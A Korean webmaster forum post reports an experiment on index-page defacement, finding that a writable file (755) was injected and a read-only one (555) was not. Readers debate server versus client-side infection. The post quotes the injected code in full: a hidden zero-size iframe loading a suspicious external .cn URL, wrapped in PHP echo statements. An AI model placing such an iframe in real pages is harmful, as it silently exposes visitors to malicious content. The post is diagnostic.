인덱스변조 예방에 대한 실험 정보
인덱스변조 예방에 대한 실험
본문
같은 문제로 한번쯤 고민했을 분들께 참고 하시라고 몇자 적습니다.
-------------------------------------------------------------
언젠가 인덱스에 알수없는 아이프레임이 삽입되 있었고..사이트는 당연히느려졌다.
뭘까...?분명히 admin은 그런적이없는데 말이지...간혹,가는 커뮤니티 게시판에서도 종종 그런문의게시가 올라오고..
그런 게시글에 답변으로 파일권한문제라고 답변을 달아줬지만 이또한 추측일뿐 그래서
실험을 해보기로 했다.
문제점]
index / main 등의 파일명을가진 파일에 아이프레임이나 암호화된스크립트등이 삽입으로인한 인덱스 변조.
실험]
사이트내에 인덱스 두개를 새로만들었다.
하나는 소유자 권한을 쓰기포함(755)
또다른 하나는 권한을 쓰기금지(555)로 두개를 만들고
root에 넣어두었다.
결과]
몇칠후 두개의 파일을 검사해보니 권한755파일에
<?php echo ''; ?><?php echo ''; ?><?php echo '<div style="visibility:hidden"><iframe src="http://directlinke.cn/in.cgi?27" width=100 height=80></iframe></div>'; ?><style type="text/css"> iframe {width:0;height:0;border:0;} </style>
<?php echo ''; ?><?php echo ''; ?><?php echo '
권한555파일에는 삽입안됨.
일단 두고보자...!
또 몇칠후 두개의 파일을 검사해보니 권한755파일에 먼저번 이미삽입된 아이프레임 말고 새로운형태의 엔코딩형태의 스크립트 삽입됨
그러나 권한555파일에는 삽입안됨.
문젠 이 두가지형태모두 클릭율을 유도하기위한 형태임.
이러한 문제는 권한이 자유로운 자유게시판을 통하여 침투하여 사이트루트내의 인덱스나 메인등의 이름을 가진 파일들을 찾아서 소유자권한이 쓰기형태인 파일을 찾아서 원하는 스크립이나 아이프레임을 삽입하는 형태라고 추측됨.
0
댓글 7개
좋은 해결책이 빨리 나왔으면 좋겟네요~~~
계정내 파일 및 디렉토리 검사
이외라면 서버가 뚫린 것이기 때문에 사실상 미는 수 밖에 없을거라고 봅니다.
저라면 리눅스 재설치하겠습니다.
서버에 있는 index파일을 직접 변조하는게 아니랍니다.
서버에 접속해서 열어보세요. 변조되어 있는지...
인덱스 파일을 불러오는 클라이언트(개인 PC)에 악성코드(바이러스)가 감염되어 그렇습니다.
100% 장담합니다. 공유기(라우터)를 의심해볼 필요도 있다고 보여집니다만....
그전에 악성코드가 삽입되어 보여지는 PC가 범인입니다.
소스를 보시면 자바스크립트입니다.
자바스크립트는 클라이언트에서 실행되는 속성때문에 클라이언트에서 삽입되어져도 원하는 결과를 얻을 수 있기 때문입니다.
만약 PHP 소스를 코드내에 삽입하는것이라면 서버를 크래킹해서 삽입하지 않고는 원하는 결과를 얻을 수 없겠지요.
결론>인덱스 파일에 이상한 코드가 삽입되어 보여지시는 분들께서는 정말 믿을 수 있는 깨끗한 PC에 가서 열어 보십시오. 절대 그런 현상이 나타나지 않을 것입니다. 믿어도 좋습니다.^^
서버 관리자나 개발자가 해결할 문제가 아니군요 -_-;
꼭 공유기를 사용하지 않는 컴퓨터에서 해보셔야합니다.
